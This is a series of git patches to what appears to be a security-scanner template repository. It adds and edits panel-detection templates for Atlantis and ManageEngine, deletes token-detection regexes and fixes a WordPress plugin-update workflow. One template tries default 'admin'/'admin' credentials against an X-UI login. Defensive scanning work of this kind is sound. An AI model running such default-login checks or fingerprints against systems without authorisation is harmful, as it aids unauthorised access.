misconfiguration/webdav-exposed.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/webdav-exposed.yaml b/misconfiguration/webdav-exposed.yaml index 7ca1715974..61010750af 100644 --- a/misconfiguration/webdav-exposed.yaml +++ b/misconfiguration/webdav-exposed.yaml @@ -4,7 +4,7 @@ info: name: Web Dav Exposed author: tess description: WebDAV is an extension to the HTTP protocol. It allows authorized users to remotely add and change content on the web server. - severity: low + severity: info tags: webdav,misconfig,exposure requests: From 1296a9aa373fc90cbb94a48300a3479d7fcaaf02 Mon Sep 17 00:00:00 2001 From: jonathanwalker <14978093+jonathanwalker@users.noreply.github.com> Date: Tue, 27 Dec 2022 11:15:25 -0800 Subject: [PATCH 0655/1133] Added Atlantis Detect Template --- technologies/atlantis-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/atlantis-detect.yaml diff --git a/technologies/atlantis-detect.yaml b/technologies/atlantis-detect.yaml new file mode 100644 index 0000000000..f846ac1191 --- /dev/null +++ b/technologies/atlantis-detect.yaml @@ -0,0 +1,22 @@ +id: atlantis-detect + +info: + name: Atlantis Detect + author: jonathanwalker + severity: info + description: Allows you to detect Atlantis instances + tags: tech,atlantis + +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "atlantis" + - type: status + status: + - 200 From 21e92ba2dbfefcd9c889618fef1ba6f8454eea97 Mon Sep 17 00:00:00 2001 From: jonathanwalker <14978093+jonathanwalker@users.noreply.github.com> Date: Tue, 27 Dec 2022 11:30:59 -0800 Subject: [PATCH 0656/1133] updated atlantis detect --- technologies/atlantis-detect.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/technologies/atlantis-detect.yaml b/technologies/atlantis-detect.yaml index f846ac1191..3326e921fa 100644 --- a/technologies/atlantis-detect.yaml +++ b/technologies/atlantis-detect.yaml @@ -2,9 +2,13 @@ id: atlantis-detect info: name: Atlantis Detect + description: Allows you to detect Atlantis instances author: jonathanwalker severity: info - description: Allows you to detect Atlantis instances + metadata: + shodan-query: http.component:"atlantis" + reference: + - https://github.com/runatlantis/atlantis tags: tech,atlantis requests: From d727037350076fc9a507c7d2682d4faaa868e7bb Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Tue, 27 Dec 2022 16:35:40 -0300 Subject: [PATCH 0657/1133] Removing redirect property - Closes #6431 (#6433) --- .github/scripts/wordpress-plugins-update.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index 501437872e..fa7f852382 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -123,8 +123,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt" From 6e471adfe74a99aa0fa5c7cc126fe7328cf47602 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 28 Dec 2022 11:36:04 +0530 Subject: [PATCH 0658/1133] Update and rename technologies/atlantis-detect.yaml to exposed-panels/atlantis-detect.yaml --- .../atlantis-detect.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) rename {technologies => exposed-panels}/atlantis-detect.yaml (69%) diff --git a/technologies/atlantis-detect.yaml b/exposed-panels/atlantis-detect.yaml similarity index 69% rename from technologies/atlantis-detect.yaml rename to exposed-panels/atlantis-detect.yaml index 3326e921fa..eae9b30d00 100644 --- a/technologies/atlantis-detect.yaml +++ b/exposed-panels/atlantis-detect.yaml @@ -2,25 +2,29 @@ id: atlantis-detect info: name: Atlantis Detect - description: Allows you to detect Atlantis instances author: jonathanwalker severity: info - metadata: - shodan-query: http.component:"atlantis" reference: - https://github.com/runatlantis/atlantis - tags: tech,atlantis + metadata: + verified: true + shodan-query: http.favicon.hash:-1706783005 + tags: panel,atlantis requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - - "atlantis" + - 'title="atlantis' + - 'Lock' + condition: and + - type: status status: - 200 From e80b28bfa6fcb95c8f736024c7b471834c329d5c Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Thu, 29 Dec 2022 06:45:36 +0100 Subject: [PATCH 0659/1133] Add files via upload --- ...ageengine-networkconfigurationmanager.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml diff --git a/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml b/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml new file mode 100644 index 0000000000..ce3aca7960 --- /dev/null +++ b/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml @@ -0,0 +1,30 @@ +id: manageengine-networkconfigurationmanager + +info: + name: ZOHO ManageEngine Network Configuration Manager + author: righettod + severity: info + metadata: + verified: true + shodan-query: http.title:"Network Configuration Manager" + tags: panel,zoho,manageengine + +requests: + - method: GET + path: + - '{{BaseURL}}/apiclient/ember/Login.jsp' + - "{{BaseURL}}/servlet/GetProductVersion" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Network Configuration Manager' + - '"https://www.manageengine.com' + condition: and + + - type: status + status: + - 200 + From 3cd4b4934ee888fbdffc3202c3ade0f6460851cc Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Thu, 29 Dec 2022 06:49:54 +0100 Subject: [PATCH 0660/1133] Cleanup useless url --- .../zoho/manageengine-networkconfigurationmanager.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml b/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml index ce3aca7960..9bd5c5aa46 100644 --- a/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml +++ b/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml @@ -13,7 +13,6 @@ requests: - method: GET path: - '{{BaseURL}}/apiclient/ember/Login.jsp' - - "{{BaseURL}}/servlet/GetProductVersion" matchers-condition: and matchers: From 704bd2e3a2f59ce5cfc17ad205fbcc889325cb4a Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Thu, 29 Dec 2022 06:51:53 +0100 Subject: [PATCH 0661/1133] Fix linter error --- .../zoho/manageengine-networkconfigurationmanager.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml b/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml index 9bd5c5aa46..b452acec49 100644 --- a/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml +++ b/exposed-panels/zoho/manageengine-networkconfigurationmanager.yaml @@ -26,4 +26,3 @@ requests: - type: status status: - 200 - From 1be74e2da5ff7460df160aaa7246bc4ddddc00c7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Dec 2022 13:38:46 +0530 Subject: [PATCH 0662/1133] Update xui-weak-login.yaml --- default-logins/xui-weak-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/xui-weak-login.yaml b/default-logins/xui-weak-login.yaml index 3c7957dfaa..173b1aa638 100644 --- a/default-logins/xui-weak-login.yaml +++ b/default-logins/xui-weak-login.yaml @@ -24,12 +24,12 @@ requests: content-type: application/x-www-form-urlencoded body: "username={{username}}&password={{password}}" + attack: pitchfork payloads: username: - "admin" password: - "admin" - attack: pitchfork matchers-condition: and matchers: From 79f04b4791dbe7fe923bd261b9d35ca303f5d095 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 29 Dec 2022 08:11:10 +0000 Subject: [PATCH 0663/1133] Auto Generated New Template Addition List [Thu Dec 29 08:11:09 UTC 2022] :robot: --- .new-additions | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/.new-additions b/.new-additions index 77080efb3a..6063e6bc9d 100644 --- a/.new-additions +++ b/.new-additions @@ -3,11 +3,18 @@ cves/2021/CVE-2021-42887.yaml cves/2022/CVE-2022-0786.yaml cves/2022/CVE-2022-25082.yaml cves/2022/CVE-2022-33891.yaml +cves/2022/CVE-2022-3768.yaml +cves/2022/CVE-2022-4260.yaml cves/2022/CVE-2022-45362.yaml +cves/2022/CVE-2022-46381.yaml +default-logins/kanboard-default-login.yaml default-logins/mobotix/mobotix-default-login.yaml default-logins/tiny-file-manager-default-login.yaml +default-logins/xui-weak-login.yaml +exposed-panels/atlantis-detect.yaml exposed-panels/content-central-login.yaml exposed-panels/creatio-login-panel.yaml +exposed-panels/kanboard-login.yaml exposed-panels/loxone-panel.yaml exposed-panels/ncentral-panel.yaml exposed-panels/posthog-admin-panel.yaml @@ -20,7 +27,10 @@ exposures/tokens/zeplin/zeplin-access-token.yaml exposures/tokens/zerobounce/zerobounce-api-token.yaml iot/carel-plantvisor-panel.yaml iot/hue-personal-wireless-panel.yaml +iot/raspberry-shake-config.yaml miscellaneous/gpc-json.yaml +misconfiguration/installer/concrete-installer.yaml +misconfiguration/installer/dolibarr-installer.yaml misconfiguration/sony-bravia-disclosure.yaml network/exposed-dockerd.yaml technologies/akamai-cache-detect.yaml From 1f7b175cbf55c95a355f8052ffbc0a861beb6e68 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Dec 2022 13:45:50 +0530 Subject: [PATCH 0664/1133] Deleted due to FPs --- .../zerobounce/zerobounce-api-token.yaml | 21 ------------------- 1 file changed, 21 deletions(-) delete mode 100644 exposures/tokens/zerobounce/zerobounce-api-token.yaml diff --git a/exposures/tokens/zerobounce/zerobounce-api-token.yaml b/exposures/tokens/zerobounce/zerobounce-api-token.yaml deleted file mode 100644 index d0d78ea99b..0000000000 --- a/exposures/tokens/zerobounce/zerobounce-api-token.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: zerobounce-api-token - -info: - name: Zerobounce API Token - author: ritikchaddha - severity: info - reference: - - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zerobounce/zerobounce.go - - https://www.zerobounce.net/docs/email-validation-api-quickstart - tags: exposure,token,zerobounce,api - -requests: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - part: body - regex: - - '([a-z0-9]{32})' From 059524ce160c7fead95afc0e571cdefeaaa9fc36 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Dec 2022 13:47:25 +0530 Subject: [PATCH 0665/1133] Delete zeplin-access-token.yaml --- .../tokens/zeplin/zeplin-access-token.yaml | 20 ------------------- 1 file changed, 20 deletions(-) delete mode 100644 exposures/tokens/zeplin/zeplin-access-token.yaml diff --git a/exposures/tokens/zeplin/zeplin-access-token.yaml b/exposures/tokens/zeplin/zeplin-access-token.yaml deleted file mode 100644 index ac3ec240b4..0000000000 --- a/exposures/tokens/zeplin/zeplin-access-token.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: zeplin-access-token -info: - name: Zeplin Access Token - author: ritikchaddha - severity: info - reference: - - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zeplin/zeplin.go - - https://app.zeplin.io/profile/developer - tags: exposure,token,zeplin - -requests: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - part: body - regex: - - '([a-zA-Z0-9-.]{350,400})' From 631656eee249dced9f7a56477d463b36500359ca Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Thu, 29 Dec 2022 05:34:11 -0300 Subject: [PATCH 0666/1133] Fix error in WordPress Plugin Update workflow (#6441) * Removing redirect property - Closes #6431 * Fix worflow error when updating WP Plugin template * update wordpress-plugins-update.yml --- .github/scripts/wordpress-plugins-update.py | 22 ++++++++++++++----- .../workflows/wordpress-plugins-update.yml | 11 +++++----- 2 files changed, 22 insertions(+), 11 deletions(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index fa7f852382..041753ca2f 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -19,6 +19,7 @@ from bs4 import BeautifulSoup import requests import re from markdown import markdown +import os from termcolor import colored, cprint # Regex to extract the name of th plugin from the URL @@ -158,14 +159,25 @@ requests: regex: - '(?i)Stable.tag:\s?([\w.]+)' ''' - version_file = open( - f"helpers/wordpress/plugins/{name}.txt", "w") + + work_dir = os.getcwd() + print(f"Current working directory: {work_dir}") + helper_dir = f"{work_dir}/helpers/wordpress/plugins" + template_dir = f"{work_dir}/technologies/wordpress/plugins" + + if not os.path.exists(helper_dir): + os.makedirs(helper_dir) + + if not os.path.exists(template_dir): + os.makedirs(template_dir) + + helper_path = f"helpers/wordpress/plugins/{name}.txt" + version_file = open(helper_path, "w") version_file.write(version) version_file.close() - # print(template) - template_file = open( - f"technologies/wordpress/plugins/{name}.yaml", "w") + template_path = f"technologies/wordpress/plugins/{name}.yaml" + template_file = open(template_path, "w") # Dev environment template_file.write(template) template_file.close() diff --git a/.github/workflows/wordpress-plugins-update.yml b/.github/workflows/wordpress-plugins-update.yml index 63bdc67c3c..20c2102261 100644 --- a/.github/workflows/wordpress-plugins-update.yml +++ b/.github/workflows/wordpress-plugins-update.yml @@ -7,9 +7,6 @@ jobs: Update: runs-on: ubuntu-latest steps: - - name: Install tree - run: sudo apt-get install tree -y - - name: Check out repository code uses: actions/checkout@v3 with: @@ -25,19 +22,21 @@ jobs: pip install -r .github/scripts/wordpress-plugins-update-requirements.txt - name: Update Templates + id: update-templates run: | python3 .github/scripts/wordpress-plugins-update.py git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT - name: Commit files - if: steps.readme-update.outputs.CHANGES > 0 + if: steps.update-templates.outputs.CHANGES > 0 run: | git config --local user.email "action@github.com" git config --local user.name "GitHub Action" - git commit -m "Auto WordPress Plugins Update [$(date)] :robot:" -a + git add --all + git commit -m "Auto WordPress Plugins Update [$(date)] :robot:" - name: Push changes - if: steps.readme-update.outputs.CHANGES > 0 + if: steps.update-templates.outputs.CHANGES > 0 uses: ad-m/github-push-action@master with: github_token: ${{ secrets.TOKEN }} From f538753e41efb33ce31e7de2722fe5214d044f09 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 29 Dec 2022 14:15:17 +0530 Subject: [PATCH 0667/1133] typo update in workflow --- .github/workflows/wordpress-plugins-update.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/wordpress-plugins-update.yml b/.github/workflows/wordpress-plugins-update.yml index 20c2102261..a5539b10ee 100644 --- a/.github/workflows/wordpress-plugins-update.yml +++ b/.github/workflows/wordpress-plugins-update.yml @@ -39,5 +39,5 @@ jobs: if: steps.update-templates.outputs.CHANGES > 0 uses: ad-m/github-push-action@master with: - github_token: ${{ secrets.TOKEN }} + github_token: ${{ secrets.GITHUB_TOKEN }} branch: ${{ github.ref }} From 157eeaa22f67f3a3d6d72c70e0508a74c3567be2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 29 Dec 2022 08:47:37 +0000 Subject: [PATCH 0668/1133] Auto WordPress Plugins Update [Thu Dec 29 08:47:37 UTC 2022] :robot: --- helpers/wordpress/plugins/ad-inserter.txt | 2 +- helpers/wordpress/plugins/all-404-redirect-to-homepage.txt | 2 +- helpers/wordpress/plugins/all-in-one-wp-migration.txt | 2 +- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/coblocks.txt | 2 +- helpers/wordpress/plugins/complianz-gdpr.txt | 2 +- helpers/wordpress/plugins/contact-form-7.txt | 2 +- helpers/wordpress/plugins/custom-post-type-ui.txt | 2 +- helpers/wordpress/plugins/duplicate-page.txt | 2 +- helpers/wordpress/plugins/easy-wp-smtp.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- .../plugins/essential-addons-for-elementor-lite.txt | 2 +- helpers/wordpress/plugins/font-awesome.txt | 2 +- helpers/wordpress/plugins/forminator.txt | 2 +- helpers/wordpress/plugins/google-listings-and-ads.txt | 2 +- helpers/wordpress/plugins/google-site-kit.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/leadin.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/meta-box.txt | 2 +- helpers/wordpress/plugins/ml-slider.txt | 2 +- helpers/wordpress/plugins/photo-gallery.txt | 2 +- helpers/wordpress/plugins/post-smtp.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/really-simple-ssl.txt | 2 +- helpers/wordpress/plugins/seo-by-rank-math.txt | 2 +- helpers/wordpress/plugins/so-widgets-bundle.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- helpers/wordpress/plugins/translatepress-multilingual.txt | 2 +- helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/woocommerce.txt | 2 +- helpers/wordpress/plugins/wordpress-seo.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- helpers/wordpress/plugins/wp-user-avatar.txt | 2 +- technologies/wordpress/plugins/ad-inserter.yaml | 3 +-- technologies/wordpress/plugins/add-to-any.yaml | 3 +-- technologies/wordpress/plugins/admin-menu-editor.yaml | 3 +-- technologies/wordpress/plugins/adminimize.yaml | 3 +-- technologies/wordpress/plugins/advanced-custom-fields.yaml | 3 +-- technologies/wordpress/plugins/akismet.yaml | 3 +-- .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 3 +-- technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 3 +-- technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 3 +-- .../plugins/all-in-one-wp-security-and-firewall.yaml | 3 +-- technologies/wordpress/plugins/amp.yaml | 3 +-- technologies/wordpress/plugins/antispam-bee.yaml | 3 +-- technologies/wordpress/plugins/astra-sites.yaml | 3 +-- technologies/wordpress/plugins/astra-widgets.yaml | 3 +-- technologies/wordpress/plugins/autoptimize.yaml | 3 +-- technologies/wordpress/plugins/backwpup.yaml | 3 +-- technologies/wordpress/plugins/better-search-replace.yaml | 3 +-- technologies/wordpress/plugins/better-wp-security.yaml | 3 +-- .../wordpress/plugins/black-studio-tinymce-widget.yaml | 3 +-- technologies/wordpress/plugins/breadcrumb-navxt.yaml | 3 +-- technologies/wordpress/plugins/broken-link-checker.yaml | 3 +-- technologies/wordpress/plugins/child-theme-configurator.yaml | 3 +-- technologies/wordpress/plugins/classic-editor.yaml | 3 +-- technologies/wordpress/plugins/classic-widgets.yaml | 3 +-- .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 3 +-- technologies/wordpress/plugins/cloudflare.yaml | 3 +-- technologies/wordpress/plugins/cmb2.yaml | 3 +-- technologies/wordpress/plugins/coblocks.yaml | 3 +-- technologies/wordpress/plugins/code-snippets.yaml | 3 +-- technologies/wordpress/plugins/coming-soon.yaml | 3 +-- technologies/wordpress/plugins/complianz-gdpr.yaml | 3 +-- technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 3 +-- technologies/wordpress/plugins/contact-form-7.yaml | 3 +-- technologies/wordpress/plugins/contact-form-cfdb7.yaml | 3 +-- technologies/wordpress/plugins/cookie-law-info.yaml | 3 +-- technologies/wordpress/plugins/cookie-notice.yaml | 3 +-- technologies/wordpress/plugins/creame-whatsapp-me.yaml | 3 +-- .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 3 +-- technologies/wordpress/plugins/custom-css-js.yaml | 3 +-- technologies/wordpress/plugins/custom-fonts.yaml | 3 +-- technologies/wordpress/plugins/custom-post-type-ui.yaml | 3 +-- technologies/wordpress/plugins/disable-comments.yaml | 3 +-- technologies/wordpress/plugins/disable-gutenberg.yaml | 3 +-- technologies/wordpress/plugins/duplicate-page.yaml | 3 +-- technologies/wordpress/plugins/duplicate-post.yaml | 3 +-- technologies/wordpress/plugins/duplicator.yaml | 5 ++--- .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 3 +-- technologies/wordpress/plugins/easy-fancybox.yaml | 3 +-- technologies/wordpress/plugins/easy-google-fonts.yaml | 3 +-- technologies/wordpress/plugins/easy-table-of-contents.yaml | 3 +-- technologies/wordpress/plugins/easy-wp-smtp.yaml | 5 ++--- technologies/wordpress/plugins/elementor.yaml | 3 +-- technologies/wordpress/plugins/elementskit-lite.yaml | 5 ++--- technologies/wordpress/plugins/enable-media-replace.yaml | 3 +-- technologies/wordpress/plugins/envato-elements.yaml | 3 +-- .../plugins/essential-addons-for-elementor-lite.yaml | 3 +-- technologies/wordpress/plugins/ewww-image-optimizer.yaml | 3 +-- technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 3 +-- .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 3 +-- technologies/wordpress/plugins/flamingo.yaml | 3 +-- technologies/wordpress/plugins/fluentform.yaml | 3 +-- technologies/wordpress/plugins/font-awesome.yaml | 3 +-- .../wordpress/plugins/force-regenerate-thumbnails.yaml | 3 +-- technologies/wordpress/plugins/formidable.yaml | 3 +-- technologies/wordpress/plugins/forminator.yaml | 3 +-- technologies/wordpress/plugins/ga-google-analytics.yaml | 3 +-- .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 3 +-- .../wordpress/plugins/google-analytics-for-wordpress.yaml | 3 +-- technologies/wordpress/plugins/google-listings-and-ads.yaml | 3 +-- technologies/wordpress/plugins/google-site-kit.yaml | 3 +-- technologies/wordpress/plugins/google-sitemap-generator.yaml | 3 +-- technologies/wordpress/plugins/gtranslate.yaml | 3 +-- technologies/wordpress/plugins/gutenberg.yaml | 3 +-- technologies/wordpress/plugins/happy-elementor-addons.yaml | 3 +-- .../wordpress/plugins/header-and-footer-scripts.yaml | 3 +-- .../wordpress/plugins/header-footer-code-manager.yaml | 3 +-- technologies/wordpress/plugins/header-footer-elementor.yaml | 3 +-- technologies/wordpress/plugins/header-footer.yaml | 3 +-- technologies/wordpress/plugins/health-check.yaml | 3 +-- technologies/wordpress/plugins/hello-dolly.yaml | 3 +-- technologies/wordpress/plugins/imagify.yaml | 3 +-- technologies/wordpress/plugins/imsanity.yaml | 3 +-- .../wordpress/plugins/insert-headers-and-footers.yaml | 3 +-- technologies/wordpress/plugins/instagram-feed.yaml | 3 +-- .../wordpress/plugins/intuitive-custom-post-order.yaml | 3 +-- technologies/wordpress/plugins/iwp-client.yaml | 3 +-- technologies/wordpress/plugins/jetpack.yaml | 3 +-- technologies/wordpress/plugins/kadence-blocks.yaml | 3 +-- technologies/wordpress/plugins/kirki.yaml | 3 +-- technologies/wordpress/plugins/leadin.yaml | 3 +-- .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 3 +-- technologies/wordpress/plugins/limit-login-attempts.yaml | 3 +-- technologies/wordpress/plugins/litespeed-cache.yaml | 3 +-- technologies/wordpress/plugins/loco-translate.yaml | 3 +-- technologies/wordpress/plugins/loginizer.yaml | 3 +-- technologies/wordpress/plugins/loginpress.yaml | 3 +-- .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 3 +-- technologies/wordpress/plugins/mailchimp-for-wp.yaml | 3 +-- technologies/wordpress/plugins/mailpoet.yaml | 3 +-- technologies/wordpress/plugins/maintenance.yaml | 3 +-- technologies/wordpress/plugins/mainwp-child.yaml | 3 +-- technologies/wordpress/plugins/malcare-security.yaml | 3 +-- technologies/wordpress/plugins/megamenu.yaml | 3 +-- technologies/wordpress/plugins/members.yaml | 3 +-- technologies/wordpress/plugins/meta-box.yaml | 3 +-- technologies/wordpress/plugins/ml-slider.yaml | 3 +-- technologies/wordpress/plugins/newsletter.yaml | 3 +-- technologies/wordpress/plugins/nextend-facebook-connect.yaml | 3 +-- technologies/wordpress/plugins/nextgen-gallery.yaml | 3 +-- technologies/wordpress/plugins/ninja-forms.yaml | 3 +-- technologies/wordpress/plugins/ocean-extra.yaml | 3 +-- technologies/wordpress/plugins/official-facebook-pixel.yaml | 3 +-- technologies/wordpress/plugins/one-click-demo-import.yaml | 3 +-- technologies/wordpress/plugins/optinmonster.yaml | 3 +-- technologies/wordpress/plugins/password-protected.yaml | 3 +-- technologies/wordpress/plugins/pdf-embedder.yaml | 3 +-- technologies/wordpress/plugins/photo-gallery.yaml | 3 +-- .../wordpress/plugins/php-compatibility-checker.yaml | 3 +-- technologies/wordpress/plugins/pixelyoursite.yaml | 3 +-- technologies/wordpress/plugins/polylang.yaml | 3 +-- technologies/wordpress/plugins/popup-builder.yaml | 3 +-- technologies/wordpress/plugins/popup-maker.yaml | 3 +-- technologies/wordpress/plugins/post-smtp.yaml | 3 +-- technologies/wordpress/plugins/post-types-order.yaml | 3 +-- .../wordpress/plugins/premium-addons-for-elementor.yaml | 5 ++--- technologies/wordpress/plugins/pretty-link.yaml | 3 +-- technologies/wordpress/plugins/really-simple-captcha.yaml | 3 +-- technologies/wordpress/plugins/really-simple-ssl.yaml | 3 +-- technologies/wordpress/plugins/redirection.yaml | 3 +-- technologies/wordpress/plugins/redux-framework.yaml | 3 +-- technologies/wordpress/plugins/regenerate-thumbnails.yaml | 3 +-- technologies/wordpress/plugins/safe-svg.yaml | 3 +-- technologies/wordpress/plugins/seo-by-rank-math.yaml | 3 +-- technologies/wordpress/plugins/sg-cachepress.yaml | 3 +-- technologies/wordpress/plugins/sg-security.yaml | 3 +-- technologies/wordpress/plugins/shortcodes-ultimate.yaml | 3 +-- .../wordpress/plugins/shortpixel-image-optimiser.yaml | 3 +-- technologies/wordpress/plugins/simple-custom-post-order.yaml | 3 +-- technologies/wordpress/plugins/simple-page-ordering.yaml | 3 +-- technologies/wordpress/plugins/siteguard.yaml | 3 +-- technologies/wordpress/plugins/siteorigin-panels.yaml | 3 +-- technologies/wordpress/plugins/smart-slider-3.yaml | 3 +-- technologies/wordpress/plugins/so-widgets-bundle.yaml | 3 +-- .../wordpress/plugins/ssl-insecure-content-fixer.yaml | 3 +-- .../plugins/stops-core-theme-and-plugin-updates.yaml | 3 +-- technologies/wordpress/plugins/sucuri-scanner.yaml | 3 +-- technologies/wordpress/plugins/svg-support.yaml | 3 +-- technologies/wordpress/plugins/table-of-contents-plus.yaml | 3 +-- technologies/wordpress/plugins/tablepress.yaml | 3 +-- technologies/wordpress/plugins/taxonomy-terms-order.yaml | 3 +-- technologies/wordpress/plugins/the-events-calendar.yaml | 3 +-- technologies/wordpress/plugins/themeisle-companion.yaml | 3 +-- technologies/wordpress/plugins/tinymce-advanced.yaml | 3 +-- .../wordpress/plugins/translatepress-multilingual.yaml | 3 +-- .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 3 +-- technologies/wordpress/plugins/under-construction-page.yaml | 3 +-- technologies/wordpress/plugins/unyson.yaml | 3 +-- technologies/wordpress/plugins/updraftplus.yaml | 3 +-- technologies/wordpress/plugins/use-any-font.yaml | 3 +-- technologies/wordpress/plugins/user-role-editor.yaml | 3 +-- technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 3 +-- technologies/wordpress/plugins/w3-total-cache.yaml | 3 +-- technologies/wordpress/plugins/webp-converter-for-media.yaml | 3 +-- technologies/wordpress/plugins/widget-importer-exporter.yaml | 3 +-- .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 3 +-- .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 3 +-- technologies/wordpress/plugins/woo-variation-swatches.yaml | 3 +-- .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 3 +-- .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 3 +-- technologies/wordpress/plugins/woocommerce-payments.yaml | 3 +-- .../wordpress/plugins/woocommerce-paypal-payments.yaml | 3 +-- .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 3 +-- technologies/wordpress/plugins/woocommerce-services.yaml | 3 +-- technologies/wordpress/plugins/woocommerce.yaml | 3 +-- technologies/wordpress/plugins/woosidebars.yaml | 3 +-- technologies/wordpress/plugins/wordfence.yaml | 3 +-- technologies/wordpress/plugins/wordpress-importer.yaml | 3 +-- technologies/wordpress/plugins/wordpress-seo.yaml | 3 +-- technologies/wordpress/plugins/worker.yaml | 3 +-- technologies/wordpress/plugins/wp-fastest-cache.yaml | 3 +-- technologies/wordpress/plugins/wp-file-manager.yaml | 3 +-- technologies/wordpress/plugins/wp-google-maps.yaml | 3 +-- technologies/wordpress/plugins/wp-mail-smtp.yaml | 3 +-- technologies/wordpress/plugins/wp-maintenance-mode.yaml | 3 +-- technologies/wordpress/plugins/wp-migrate-db.yaml | 3 +-- technologies/wordpress/plugins/wp-multibyte-patch.yaml | 3 +-- technologies/wordpress/plugins/wp-optimize.yaml | 3 +-- technologies/wordpress/plugins/wp-pagenavi.yaml | 3 +-- technologies/wordpress/plugins/wp-reset.yaml | 3 +-- technologies/wordpress/plugins/wp-sitemap-page.yaml | 3 +-- technologies/wordpress/plugins/wp-smushit.yaml | 3 +-- technologies/wordpress/plugins/wp-statistics.yaml | 3 +-- technologies/wordpress/plugins/wp-super-cache.yaml | 3 +-- technologies/wordpress/plugins/wp-user-avatar.yaml | 3 +-- technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 3 +-- technologies/wordpress/plugins/wpcf7-redirect.yaml | 3 +-- technologies/wordpress/plugins/wpforms-lite.yaml | 3 +-- technologies/wordpress/plugins/wps-hide-login.yaml | 3 +-- technologies/wordpress/plugins/yith-woocommerce-compare.yaml | 3 +-- .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 3 +-- 236 files changed, 240 insertions(+), 440 